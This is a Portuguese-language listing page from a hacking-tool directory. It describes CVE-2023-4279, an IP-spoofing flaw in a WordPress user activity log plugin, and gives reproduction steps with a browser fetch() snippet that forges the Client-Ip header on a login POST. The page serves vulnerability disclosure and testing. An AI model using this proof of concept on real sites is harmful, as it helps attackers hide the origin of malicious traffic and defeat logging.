Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-4279 — Repositório para a vulnerabilidade CVE-2023-4279. | Kitploit
Ferramentas/GitHubGitHub/b0marek/cve-2023-4279
Análise de VulnerabilidadesExploraçãoEvasão de IDS/IPSFerramentas de ImpersonaçãoColeta de InformaçõesSegurança Web
GitHubb0marek/cve-2023-4279

CVE-2023-4279

Repositório para a vulnerabilidade CVE-2023-4279.

Ver Repositório
6há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE ID: CVE-2023-4279

Tipo de Vulnerabilidade: Falsificação de Endereço IP

Descrição: Este plugin obtém endereços IP de clientes a partir de cabeçalhos potencialmente não confiáveis, permitindo que um invasor manipule seu valor. Isso pode ser usado para ocultar a origem de tráfego malicioso.

Passos para reproduzir:

root@kitploit:~
1. In User Activity Log > Settings, enable the setting "Allow Ip Address of users to log." and save settings.

2. Run the following code in the web browser and note on the backend that the IP address has been faked.

await fetch("/wp-login.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
    "Client-Ip": "8.8.8.8",
  },
  "body": "log=USERNAME&pwd=PASSWORD",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
}); 

Referência:

  1. https://wpscan.com/vulnerability/2bd2579e-b383-4d12-b207-6fc32cfb82bc
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4279
  3. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-activity-log/user-activity-log-166-ip-address-spoofing
Baixar ferramenta